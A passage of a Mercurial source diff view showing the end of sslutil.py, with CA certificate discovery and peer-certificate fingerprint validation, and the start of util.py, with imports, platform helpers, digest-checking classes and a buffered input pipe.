740 # FUTURE Consider looking for Homebrew or MacPorts installed certs
740 # FUTURE Consider looking for Homebrew or MacPorts installed certs
741 # files. Also consider exporting the keychain certs to a file during
741 # files. Also consider exporting the keychain certs to a file during
742 # Mercurial install.
742 # Mercurial install.
743 if not _canloaddefaultcerts:
743 if not _canloaddefaultcerts:
744 ui.warn(_('(unable to load CA certificates; see '
744 ui.warn(_('(unable to load CA certificates; see '
745 'https://mercurial-scm.org/wiki/SecureConnections for '
745 'https://mercurial-scm.org/wiki/SecureConnections for '
746 'how to configure Mercurial to avoid this message)\n'))
746 'how to configure Mercurial to avoid this message)\n'))
747 return None
747 return None
748
748
749 # / is writable on Windows. Out of an abundance of caution make sure
749 # / is writable on Windows. Out of an abundance of caution make sure
750 # we're not on Windows because paths from _systemcacerts could be installed
750 # we're not on Windows because paths from _systemcacerts could be installed
751 # by non-admin users.
751 # by non-admin users.
752 assert not pycompat.iswindows
752 assert not pycompat.iswindows
753
753
754 # Try to find CA certificates in well-known locations. We print a warning
754 # Try to find CA certificates in well-known locations. We print a warning
755 # when using a found file because we don't want too much silent magic
755 # when using a found file because we don't want too much silent magic
756 # for security settings. The expectation is that proper Mercurial
756 # for security settings. The expectation is that proper Mercurial
757 # installs will have the CA certs path defined at install time and the
757 # installs will have the CA certs path defined at install time and the
758 # installer/packager will make an appropriate decision on the user's
758 # installer/packager will make an appropriate decision on the user's
759 # behalf. We only get here and perform this setting as a feature of
759 # behalf. We only get here and perform this setting as a feature of
760 # last resort.
760 # last resort.
761 if not _canloaddefaultcerts:
761 if not _canloaddefaultcerts:
762 for path in _systemcacertpaths:
762 for path in _systemcacertpaths:
763 if os.path.isfile(path):
763 if os.path.isfile(path):
764 ui.warn(_('(using CA certificates from %s; if you see this '
764 ui.warn(_('(using CA certificates from %s; if you see this '
765 'message, your Mercurial install is not properly '
765 'message, your Mercurial install is not properly '
766 'configured; see '
766 'configured; see '
767 'https://mercurial-scm.org/wiki/SecureConnections '
767 'https://mercurial-scm.org/wiki/SecureConnections '
768 'for how to configure Mercurial to avoid this '
768 'for how to configure Mercurial to avoid this '
769 'message)\n') % path)
769 'message)\n') % path)
770 return path
770 return path
771
771
772 ui.warn(_('(unable to load CA certificates; see '
772 ui.warn(_('(unable to load CA certificates; see '
773 'https://mercurial-scm.org/wiki/SecureConnections for '
773 'https://mercurial-scm.org/wiki/SecureConnections for '
774 'how to configure Mercurial to avoid this message)\n'))
774 'how to configure Mercurial to avoid this message)\n'))
775
775
776 return None
776 return None
777
777
778 def validatesocket(sock):
778 def validatesocket(sock):
779 """Validate a socket meets security requirements.
779 """Validate a socket meets security requirements.
780
780
781 The passed socket must have been created with ``wrapsocket()``.
781 The passed socket must have been created with ``wrapsocket()``.
782 """
782 """
783 host = sock._hgstate['hostname']
783 host = sock._hgstate['hostname']
784 ui = sock._hgstate['ui']
784 ui = sock._hgstate['ui']
785 settings = sock._hgstate['settings']
785 settings = sock._hgstate['settings']
786
786
787 try:
787 try:
788 peercert = sock.getpeercert(True)
788 peercert = sock.getpeercert(True)
789 peercert2 = sock.getpeercert()
789 peercert2 = sock.getpeercert()
790 except AttributeError:
790 except AttributeError:
791 raise error.Abort(_('%s ssl connection error') % host)
791 raise error.Abort(_('%s ssl connection error') % host)
792
792
793 if not peercert:
793 if not peercert:
794 raise error.Abort(_('%s certificate error: '
794 raise error.Abort(_('%s certificate error: '
795 'no certificate received') % host)
795 'no certificate received') % host)
796
796
797 if settings['disablecertverification']:
797 if settings['disablecertverification']:
798 # We don't print the certificate fingerprint because it shouldn't
798 # We don't print the certificate fingerprint because it shouldn't
799 # be necessary: if the user requested certificate verification be
799 # be necessary: if the user requested certificate verification be
800 # disabled, they presumably already saw a message about the inability
800 # disabled, they presumably already saw a message about the inability
801 # to verify the certificate and this message would have printed the
801 # to verify the certificate and this message would have printed the
802 # fingerprint. So printing the fingerprint here adds little to no
802 # fingerprint. So printing the fingerprint here adds little to no
803 # value.
803 # value.
804 ui.warn(_('warning: connection security to %s is disabled per current '
804 ui.warn(_('warning: connection security to %s is disabled per current '
805 'settings; communication is susceptible to eavesdropping '
805 'settings; communication is susceptible to eavesdropping '
806 'and tampering\n') % host)
806 'and tampering\n') % host)
807 return
807 return
808
808
809 # If a certificate fingerprint is pinned, use it and only it to
809 # If a certificate fingerprint is pinned, use it and only it to
810 # validate the remote cert.
810 # validate the remote cert.
811 peerfingerprints = {
811 peerfingerprints = {
812 'sha1': hashlib.sha1(peercert).hexdigest(),
812 'sha1': hashlib.sha1(peercert).hexdigest(),
813 'sha256': hashlib.sha256(peercert).hexdigest(),
813 'sha256': hashlib.sha256(peercert).hexdigest(),
814 'sha512': hashlib.sha512(peercert).hexdigest(),
814 'sha512': hashlib.sha512(peercert).hexdigest(),
815 }
815 }
816
816
817 def fmtfingerprint(s):
817 def fmtfingerprint(s):
818 return ':'.join([s[x:x + 2] for x in range(0, len(s), 2)])
818 return ':'.join([s[x:x + 2] for x in range(0, len(s), 2)])
819
819
820 nicefingerprint = 'sha256:%s' % fmtfingerprint(peerfingerprints['sha256'])
820 nicefingerprint = 'sha256:%s' % fmtfingerprint(peerfingerprints['sha256'])
821
821
822 if settings['certfingerprints']:
822 if settings['certfingerprints']:
823 for hash, fingerprint in settings['certfingerprints']:
823 for hash, fingerprint in settings['certfingerprints']:
824 if peerfingerprints[hash].lower() == fingerprint:
824 if peerfingerprints[hash].lower() == fingerprint:
825 ui.debug('%s certificate matched fingerprint %s:%s\n' %
825 ui.debug('%s certificate matched fingerprint %s:%s\n' %
826 (host, hash, fmtfingerprint(fingerprint)))
826 (host, hash, fmtfingerprint(fingerprint)))
827 if settings['legacyfingerprint']:
827 if settings['legacyfingerprint']:
828 ui.warn(_('(SHA-1 fingerprint for %s found in legacy '
828 ui.warn(_('(SHA-1 fingerprint for %s found in legacy '
829 '[hostfingerprints] section; '
829 '[hostfingerprints] section; '
830 'if you trust this fingerprint, remove the old '
830 'if you trust this fingerprint, remove the old '
831 'SHA-1 fingerprint from [hostfingerprints] and '
831 'SHA-1 fingerprint from [hostfingerprints] and '
832 'add the following entry to the new '
832 'add the following entry to the new '
833 '[hostsecurity] section: %s:fingerprints=%s)\n') %
833 '[hostsecurity] section: %s:fingerprints=%s)\n') %
834 (host, host, nicefingerprint))
834 (host, host, nicefingerprint))
835 return
835 return
836
836
837 # Pinned fingerprint didn't match. This is a fatal error.
837 # Pinned fingerprint didn't match. This is a fatal error.
838 if settings['legacyfingerprint']:
838 if settings['legacyfingerprint']:
839 section = 'hostfingerprint'
839 section = 'hostfingerprint'
840 nice = fmtfingerprint(peerfingerprints['sha1'])
840 nice = fmtfingerprint(peerfingerprints['sha1'])
841 else:
841 else:
842 section = 'hostsecurity'
842 section = 'hostsecurity'
843 nice = '%s:%s' % (hash, fmtfingerprint(peerfingerprints[hash]))
843 nice = '%s:%s' % (hash, fmtfingerprint(peerfingerprints[hash]))
844 raise error.Abort(_('certificate for %s has unexpected '
844 raise error.Abort(_('certificate for %s has unexpected '
845 'fingerprint %s') % (host, nice),
845 'fingerprint %s') % (host, nice),
846 hint=_('check %s configuration') % section)
846 hint=_('check %s configuration') % section)
847
847
848 # Security is enabled but no CAs are loaded. We can't establish trust
848 # Security is enabled but no CAs are loaded. We can't establish trust
849 # for the cert so abort.
849 # for the cert so abort.
850 if not sock._hgstate['caloaded']:
850 if not sock._hgstate['caloaded']:
851 raise error.Abort(
851 raise error.Abort(
852 _('unable to verify security of %s (no loaded CA certificates); '
852 _('unable to verify security of %s (no loaded CA certificates); '
853 'refusing to connect') % host,
853 'refusing to connect') % host,
854 hint=_('see https://mercurial-scm.org/wiki/SecureConnections for '
854 hint=_('see https://mercurial-scm.org/wiki/SecureConnections for '
855 'how to configure Mercurial to avoid this error or set '
855 'how to configure Mercurial to avoid this error or set '
856 'hostsecurity.%s:fingerprints=%s to trust this server') %
856 'hostsecurity.%s:fingerprints=%s to trust this server') %
857 (host, nicefingerprint))
857 (host, nicefingerprint))
858
858
859 msg = _verifycert(peercert2, host)
859 msg = _verifycert(peercert2, host)
860 if msg:
860 if msg:
861 raise error.Abort(_('%s certificate error: %s') % (host, msg),
861 raise error.Abort(_('%s certificate error: %s') % (host, msg),
862 hint=_('set hostsecurity.%s:certfingerprints=%s '
862 hint=_('set hostsecurity.%s:certfingerprints=%s '
863 'config setting or use --insecure to connect '
863 'config setting or use --insecure to connect '
864 'insecurely') %
864 'insecurely') %
865 (host, nicefingerprint))
865 (host, nicefingerprint))
@@ -1,3861 +1,3861 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import itertools
29 import itertools
30 import mmap
30 import mmap
31 import os
31 import os
32 import platform as pyplatform
32 import platform as pyplatform
33 import re as remod
33 import re as remod
34 import shutil
34 import shutil
35 import signal
35 import signal
36 import socket
36 import socket
37 import stat
37 import stat
38 import string
38 import string
39 import subprocess
39 import subprocess
40 import sys
40 import sys
41 import tempfile
41 import tempfile
42 import textwrap
42 import textwrap
43 import time
43 import time
44 import traceback
44 import traceback
45 import warnings
45 import warnings
46 import zlib
46 import zlib
47
47
48 from . import (
48 from . import (
49 encoding,
49 encoding,
50 error,
50 error,
51 i18n,
51 i18n,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56
56
57 base85 = policy.importmod(r'base85')
57 base85 = policy.importmod(r'base85')
58 osutil = policy.importmod(r'osutil')
58 osutil = policy.importmod(r'osutil')
59 parsers = policy.importmod(r'parsers')
59 parsers = policy.importmod(r'parsers')
60
60
61 b85decode = base85.b85decode
61 b85decode = base85.b85decode
62 b85encode = base85.b85encode
62 b85encode = base85.b85encode
63
63
64 cookielib = pycompat.cookielib
64 cookielib = pycompat.cookielib
65 empty = pycompat.empty
65 empty = pycompat.empty
66 httplib = pycompat.httplib
66 httplib = pycompat.httplib
67 pickle = pycompat.pickle
67 pickle = pycompat.pickle
68 queue = pycompat.queue
68 queue = pycompat.queue
69 socketserver = pycompat.socketserver
69 socketserver = pycompat.socketserver
70 stderr = pycompat.stderr
70 stderr = pycompat.stderr
71 stdin = pycompat.stdin
71 stdin = pycompat.stdin
72 stdout = pycompat.stdout
72 stdout = pycompat.stdout
73 stringio = pycompat.stringio
73 stringio = pycompat.stringio
74 xmlrpclib = pycompat.xmlrpclib
74 xmlrpclib = pycompat.xmlrpclib
75
75
76 httpserver = urllibcompat.httpserver
76 httpserver = urllibcompat.httpserver
77 urlerr = urllibcompat.urlerr
77 urlerr = urllibcompat.urlerr
78 urlreq = urllibcompat.urlreq
78 urlreq = urllibcompat.urlreq
79
79
80 # workaround for win32mbcs
80 # workaround for win32mbcs
81 _filenamebytestr = pycompat.bytestr
81 _filenamebytestr = pycompat.bytestr
82
82
83 def isatty(fp):
83 def isatty(fp):
84 try:
84 try:
85 return fp.isatty()
85 return fp.isatty()
86 except AttributeError:
86 except AttributeError:
87 return False
87 return False
88
88
89 # glibc determines buffering on first write to stdout - if we replace a TTY
89 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # destined stdout with a pipe destined stdout (e.g. pager), we want line
90 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # buffering
91 # buffering
92 if isatty(stdout):
92 if isatty(stdout):
93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94
94
95 if pycompat.iswindows:
95 if pycompat.iswindows:
96 from . import windows as platform
96 from . import windows as platform
97 stdout = platform.winstdout(stdout)
97 stdout = platform.winstdout(stdout)
98 else:
98 else:
99 from . import posix as platform
99 from . import posix as platform
100
100
101 _ = i18n._
101 _ = i18n._
102
102
103 bindunixsocket = platform.bindunixsocket
103 bindunixsocket = platform.bindunixsocket
104 cachestat = platform.cachestat
104 cachestat = platform.cachestat
105 checkexec = platform.checkexec
105 checkexec = platform.checkexec
106 checklink = platform.checklink
106 checklink = platform.checklink
107 copymode = platform.copymode
107 copymode = platform.copymode
108 executablepath = platform.executablepath
108 executablepath = platform.executablepath
109 expandglobs = platform.expandglobs
109 expandglobs = platform.expandglobs
110 explainexit = platform.explainexit
110 explainexit = platform.explainexit
111 findexe = platform.findexe
111 findexe = platform.findexe
112 gethgcmd = platform.gethgcmd
112 gethgcmd = platform.gethgcmd
113 getuser = platform.getuser
113 getuser = platform.getuser
114 getpid = os.getpid
114 getpid = os.getpid
115 groupmembers = platform.groupmembers
115 groupmembers = platform.groupmembers
116 groupname = platform.groupname
116 groupname = platform.groupname
117 hidewindow = platform.hidewindow
117 hidewindow = platform.hidewindow
118 isexec = platform.isexec
118 isexec = platform.isexec
119 isowner = platform.isowner
119 isowner = platform.isowner
120 listdir = osutil.listdir
120 listdir = osutil.listdir
121 localpath = platform.localpath
121 localpath = platform.localpath
122 lookupreg = platform.lookupreg
122 lookupreg = platform.lookupreg
123 makedir = platform.makedir
123 makedir = platform.makedir
124 nlinks = platform.nlinks
124 nlinks = platform.nlinks
125 normpath = platform.normpath
125 normpath = platform.normpath
126 normcase = platform.normcase
126 normcase = platform.normcase
127 normcasespec = platform.normcasespec
127 normcasespec = platform.normcasespec
128 normcasefallback = platform.normcasefallback
128 normcasefallback = platform.normcasefallback
129 openhardlinks = platform.openhardlinks
129 openhardlinks = platform.openhardlinks
130 oslink = platform.oslink
130 oslink = platform.oslink
131 parsepatchoutput = platform.parsepatchoutput
131 parsepatchoutput = platform.parsepatchoutput
132 pconvert = platform.pconvert
132 pconvert = platform.pconvert
133 poll = platform.poll
133 poll = platform.poll
134 popen = platform.popen
134 popen = platform.popen
135 posixfile = platform.posixfile
135 posixfile = platform.posixfile
136 quotecommand = platform.quotecommand
136 quotecommand = platform.quotecommand
137 readpipe = platform.readpipe
137 readpipe = platform.readpipe
138 rename = platform.rename
138 rename = platform.rename
139 removedirs = platform.removedirs
139 removedirs = platform.removedirs
140 samedevice = platform.samedevice
140 samedevice = platform.samedevice
141 samefile = platform.samefile
141 samefile = platform.samefile
142 samestat = platform.samestat
142 samestat = platform.samestat
143 setbinary = platform.setbinary
143 setbinary = platform.setbinary
144 setflags = platform.setflags
144 setflags = platform.setflags
145 setsignalhandler = platform.setsignalhandler
145 setsignalhandler = platform.setsignalhandler
146 shellquote = platform.shellquote
146 shellquote = platform.shellquote
147 spawndetached = platform.spawndetached
147 spawndetached = platform.spawndetached
148 split = platform.split
148 split = platform.split
149 sshargs = platform.sshargs
149 sshargs = platform.sshargs
150 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
150 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
151 statisexec = platform.statisexec
151 statisexec = platform.statisexec
152 statislink = platform.statislink
152 statislink = platform.statislink
153 testpid = platform.testpid
153 testpid = platform.testpid
154 umask = platform.umask
154 umask = platform.umask
155 unlink = platform.unlink
155 unlink = platform.unlink
156 username = platform.username
156 username = platform.username
157
157
158 try:
158 try:
159 recvfds = osutil.recvfds
159 recvfds = osutil.recvfds
160 except AttributeError:
160 except AttributeError:
161 pass
161 pass
162 try:
162 try:
163 setprocname = osutil.setprocname
163 setprocname = osutil.setprocname
164 except AttributeError:
164 except AttributeError:
165 pass
165 pass
166
166
167 # Python compatibility
167 # Python compatibility
168
168
169 _notset = object()
169 _notset = object()
170
170
171 # disable Python's problematic floating point timestamps (issue4836)
171 # disable Python's problematic floating point timestamps (issue4836)
172 # (Python hypocritically says you shouldn't change this behavior in
172 # (Python hypocritically says you shouldn't change this behavior in
173 # libraries, and sure enough Mercurial is not a library.)
173 # libraries, and sure enough Mercurial is not a library.)
174 os.stat_float_times(False)
174 os.stat_float_times(False)
175
175
176 def safehasattr(thing, attr):
176 def safehasattr(thing, attr):
177 return getattr(thing, attr, _notset) is not _notset
177 return getattr(thing, attr, _notset) is not _notset
178
178
179 def bytesinput(fin, fout, *args, **kwargs):
179 def bytesinput(fin, fout, *args, **kwargs):
180 sin, sout = sys.stdin, sys.stdout
180 sin, sout = sys.stdin, sys.stdout
181 try:
181 try:
182 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
182 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
183 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
183 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
184 finally:
184 finally:
185 sys.stdin, sys.stdout = sin, sout
185 sys.stdin, sys.stdout = sin, sout
186
186
187 def bitsfrom(container):
187 def bitsfrom(container):
188 bits = 0
188 bits = 0
189 for bit in container:
189 for bit in container:
190 bits |= bit
190 bits |= bit
191 return bits
191 return bits
192
192
193 # python 2.6 still have deprecation warning enabled by default. We do not want
193 # python 2.6 still have deprecation warning enabled by default. We do not want
194 # to display anything to standard user so detect if we are running test and
194 # to display anything to standard user so detect if we are running test and
195 # only use python deprecation warning in this case.
195 # only use python deprecation warning in this case.
196 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
196 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
197 if _dowarn:
197 if _dowarn:
198 # explicitly unfilter our warning for python 2.7
198 # explicitly unfilter our warning for python 2.7
199 #
199 #
200 # The option of setting PYTHONWARNINGS in the test runner was investigated.
200 # The option of setting PYTHONWARNINGS in the test runner was investigated.
201 # However, module name set through PYTHONWARNINGS was exactly matched, so
201 # However, module name set through PYTHONWARNINGS was exactly matched, so
202 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
202 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
203 # makes the whole PYTHONWARNINGS thing useless for our usecase.
203 # makes the whole PYTHONWARNINGS thing useless for our usecase.
204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207
207
208 def nouideprecwarn(msg, version, stacklevel=1):
208 def nouideprecwarn(msg, version, stacklevel=1):
209 """Issue an python native deprecation warning
209 """Issue an python native deprecation warning
210
210
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 """
212 """
213 if _dowarn:
213 if _dowarn:
214 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
214 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
215 " update your code.)") % version
215 " update your code.)") % version
216 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
216 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217
217
218 DIGESTS = {
218 DIGESTS = {
219 'md5': hashlib.md5,
219 'md5': hashlib.md5,
220 'sha1': hashlib.sha1,
220 'sha1': hashlib.sha1,
221 'sha512': hashlib.sha512,
221 'sha512': hashlib.sha512,
222 }
222 }
223 # List of digest types from strongest to weakest
223 # List of digest types from strongest to weakest
224 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
224 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
225
225
226 for k in DIGESTS_BY_STRENGTH:
226 for k in DIGESTS_BY_STRENGTH:
227 assert k in DIGESTS
227 assert k in DIGESTS
228
228
229 class digester(object):
229 class digester(object):
230 """helper to compute digests.
230 """helper to compute digests.
231
231
232 This helper can be used to compute one or more digests given their name.
232 This helper can be used to compute one or more digests given their name.
233
233
234 >>> d = digester([b'md5', b'sha1'])
234 >>> d = digester([b'md5', b'sha1'])
235 >>> d.update(b'foo')
235 >>> d.update(b'foo')
236 >>> [k for k in sorted(d)]
236 >>> [k for k in sorted(d)]
237 ['md5', 'sha1']
237 ['md5', 'sha1']
238 >>> d[b'md5']
238 >>> d[b'md5']
239 'acbd18db4cc2f85cedef654fccc4a4d8'
239 'acbd18db4cc2f85cedef654fccc4a4d8'
240 >>> d[b'sha1']
240 >>> d[b'sha1']
241 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
241 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
242 >>> digester.preferred([b'md5', b'sha1'])
242 >>> digester.preferred([b'md5', b'sha1'])
243 'sha1'
243 'sha1'
244 """
244 """
245
245
246 def __init__(self, digests, s=''):
246 def __init__(self, digests, s=''):
247 self._hashes = {}
247 self._hashes = {}
248 for k in digests:
248 for k in digests:
249 if k not in DIGESTS:
249 if k not in DIGESTS:
250 raise Abort(_('unknown digest type: %s') % k)
250 raise Abort(_('unknown digest type: %s') % k)
251 self._hashes[k] = DIGESTS[k]()
251 self._hashes[k] = DIGESTS[k]()
252 if s:
252 if s:
253 self.update(s)
253 self.update(s)
254
254
255 def update(self, data):
255 def update(self, data):
256 for h in self._hashes.values():
256 for h in self._hashes.values():
257 h.update(data)
257 h.update(data)
258
258
259 def __getitem__(self, key):
259 def __getitem__(self, key):
260 if key not in DIGESTS:
260 if key not in DIGESTS:
261 raise Abort(_('unknown digest type: %s') % k)
261 raise Abort(_('unknown digest type: %s') % k)
262 return self._hashes[key].hexdigest()
262 return self._hashes[key].hexdigest()
263
263
264 def __iter__(self):
264 def __iter__(self):
265 return iter(self._hashes)
265 return iter(self._hashes)
266
266
267 @staticmethod
267 @staticmethod
268 def preferred(supported):
268 def preferred(supported):
269 """returns the strongest digest type in both supported and DIGESTS."""
269 """returns the strongest digest type in both supported and DIGESTS."""
270
270
271 for k in DIGESTS_BY_STRENGTH:
271 for k in DIGESTS_BY_STRENGTH:
272 if k in supported:
272 if k in supported:
273 return k
273 return k
274 return None
274 return None
275
275
276 class digestchecker(object):
276 class digestchecker(object):
277 """file handle wrapper that additionally checks content against a given
277 """file handle wrapper that additionally checks content against a given
278 size and digests.
278 size and digests.
279
279
280 d = digestchecker(fh, size, {'md5': '...'})
280 d = digestchecker(fh, size, {'md5': '...'})
281
281
282 When multiple digests are given, all of them are validated.
282 When multiple digests are given, all of them are validated.
283 """
283 """
284
284
285 def __init__(self, fh, size, digests):
285 def __init__(self, fh, size, digests):
286 self._fh = fh
286 self._fh = fh
287 self._size = size
287 self._size = size
288 self._got = 0
288 self._got = 0
289 self._digests = dict(digests)
289 self._digests = dict(digests)
290 self._digester = digester(self._digests.keys())
290 self._digester = digester(self._digests.keys())
291
291
292 def read(self, length=-1):
292 def read(self, length=-1):
293 content = self._fh.read(length)
293 content = self._fh.read(length)
294 self._digester.update(content)
294 self._digester.update(content)
295 self._got += len(content)
295 self._got += len(content)
296 return content
296 return content
297
297
298 def validate(self):
298 def validate(self):
299 if self._size != self._got:
299 if self._size != self._got:
300 raise Abort(_('size mismatch: expected %d, got %d') %
300 raise Abort(_('size mismatch: expected %d, got %d') %
301 (self._size, self._got))
301 (self._size, self._got))
302 for k, v in self._digests.items():
302 for k, v in self._digests.items():
303 if v != self._digester[k]:
303 if v != self._digester[k]:
304 # i18n: first parameter is a digest name
304 # i18n: first parameter is a digest name
305 raise Abort(_('%s mismatch: expected %s, got %s') %
305 raise Abort(_('%s mismatch: expected %s, got %s') %
306 (k, v, self._digester[k]))
306 (k, v, self._digester[k]))
307
307
308 try:
308 try:
309 buffer = buffer
309 buffer = buffer
310 except NameError:
310 except NameError:
311 def buffer(sliceable, offset=0, length=None):
311 def buffer(sliceable, offset=0, length=None):
312 if length is not None:
312 if length is not None:
313 return memoryview(sliceable)[offset:offset + length]
313 return memoryview(sliceable)[offset:offset + length]
314 return memoryview(sliceable)[offset:]
314 return memoryview(sliceable)[offset:]
315
315
316 closefds = pycompat.isposix
316 closefds = pycompat.isposix
317
317
318 _chunksize = 4096
318 _chunksize = 4096
319
319
320 class bufferedinputpipe(object):
320 class bufferedinputpipe(object):
321 """a manually buffered input pipe
321 """a manually buffered input pipe
322
322
323 Python will not let us use buffered IO and lazy reading with 'polling' at
323 Python will not let us use buffered IO and lazy reading with 'polling' at
324 the same time. We cannot probe the buffer state and select will not detect
324 the same time. We cannot probe the buffer state and select will not detect
325 that data are ready to read if they are already buffered.
325 that data are ready to read if they are already buffered.
326
326
327 This class let us work around that by implementing its own buffering
327 This class let us work around that by implementing its own buffering
328 (allowing efficient readline) while offering a way to know if the buffer is
328 (allowing efficient readline) while offering a way to know if the buffer is
329 empty from the output (allowing collaboration of the buffer with polling).
329 empty from the output (allowing collaboration of the buffer with polling).
330
330
331 This class lives in the 'util' module because it makes use of the 'os'
331 This class lives in the 'util' module because it makes use of the 'os'
332 module from the python stdlib.
332 module from the python stdlib.
333 """
333 """
334
334
335 def __init__(self, input):
335 def __init__(self, input):
336 self._input = input
336 self._input = input
337 self._buffer = []
337 self._buffer = []
338 self._eof = False
338 self._eof = False
339 self._lenbuf = 0
339 self._lenbuf = 0
340
340
341 @property
341 @property
342 def hasbuffer(self):
342 def hasbuffer(self):
343 """True is any data is currently buffered
343 """True is any data is currently buffered
344
344
345 This will be used externally a pre-step for polling IO. If there is
345 This will be used externally a pre-step for polling IO. If there is
346 already data then no polling should be set in place."""
346 already data then no polling should be set in place."""
347 return bool(self._buffer)
347 return bool(self._buffer)
348
348
349 @property
349 @property
350 def closed(self):
350 def closed(self):
351 return self._input.closed
351 return self._input.closed
352
352
353 def fileno(self):
353 def fileno(self):
354 return self._input.fileno()
354 return self._input.fileno()
355
355
356 def close(self):
356 def close(self):
357 return self._input.close()
357 return self._input.close()
358
358
359 def read(self, size):
359 def read(self, size):
360 while (not self._eof) and (self._lenbuf < size):
360 while (not self._eof) and (self._lenbuf < size):
361 self._fillbuffer()
361 self._fillbuffer()
362 return self._frombuffer(size)
362 return self._frombuffer(size)
363
363
364 def readline(self, *args, **kwargs):
364 def readline(self, *args, **kwargs):
365 if 1 < len(self._buffer):
365 if 1 < len(self._buffer):
366 # this should not happen because both read and readline end with a
366 # this should not happen because both read and readline end with a
367 # _frombuffer call that collapse it.
367 # _frombuffer call that collapse it.
368 self._buffer = [''.join(self._buffer)]
368 self._buffer = [''.join(self._buffer)]
369 self._lenbuf = len(self._buffer[0])
369 self._lenbuf = len(self._buffer[0])
370 lfi = -1
370 lfi = -1
371 if self._buffer:
371 if self._buffer:
372 lfi = self._buffer[-1].find('\n')
372 lfi = self._buffer[-1].find('\n')
373 while (not self._eof) and lfi < 0:
373 while (not self._eof) and lfi < 0:
374 self._fillbuffer()
374 self._fillbuffer()
375 if self._buffer:
375 if self._buffer:
376 lfi = self._buffer[-1].find('\n')
376 lfi = self._buffer[-1].find('\n')
377 size = lfi + 1
377 size = lfi + 1
378 if lfi < 0: # end of file
378 if lfi < 0: # end of file
379 size = self._lenbuf
379 size = self._lenbuf
380 elif 1 < len(self._buffer):
380 elif 1 < len(self._buffer):
381 # we need to take previous chunks into account
381 # we need to take previous chunks into account
382 size += self._lenbuf - len(self._buffer[-1])
382 size += self._lenbuf - len(self._buffer[-1])
383 return self._frombuffer(size)
383 return self._frombuffer(size)
384
384
385 def _frombuffer(self, size):
385 def _frombuffer(self, size):
386 """return at most 'size' data from the buffer
386 """return at most 'size' data from the buffer
387
387
388 The data are removed from the buffer."""
388 The data are removed from the buffer."""
389 if size == 0 or not self._buffer:
389 if size == 0 or not self._buffer:
390 return ''
390 return ''
391 buf = self._buffer[0]
391 buf = self._buffer[0]
392 if 1 < len(self._buffer):
392 if 1 < len(self._buffer):
393 buf = ''.join(self._buffer)
393 buf = ''.join(self._buffer)
394
394
395 data = buf[:size]
395 data = buf[:size]
396 buf = buf[len(data):]
396 buf = buf[len(data):]
397 if buf:
397 if buf:
398 self._buffer = [buf]
398 self._buffer = [buf]
399 self._lenbuf = len(buf)
399 self._lenbuf = len(buf)
400 else:
400 else:
401 self._buffer = []
401 self._buffer = []
402 self._lenbuf = 0
402 self._lenbuf = 0
403 return data
403 return data
404
404
405 def _fillbuffer(self):
405 def _fillbuffer(self):
406 """read data to the buffer"""
406 """read data to the buffer"""
407 data = os.read(self._input.fileno(), _chunksize)
407 data = os.read(self._input.fileno(), _chunksize)
408 if not data:
408 if not data:
409 self._eof = True
409 self._eof = True
410 else:
410 else:
411 self._lenbuf += len(data)
411 self._lenbuf += len(data)
412 self._buffer.append(data)
412 self._buffer.append(data)
413
413
414 def mmapread(fp):
414 def mmapread(fp):
415 try:
415 try:
416 fd = getattr(fp, 'fileno', lambda: fp)()
416 fd = getattr(fp, 'fileno', lambda: fp)()
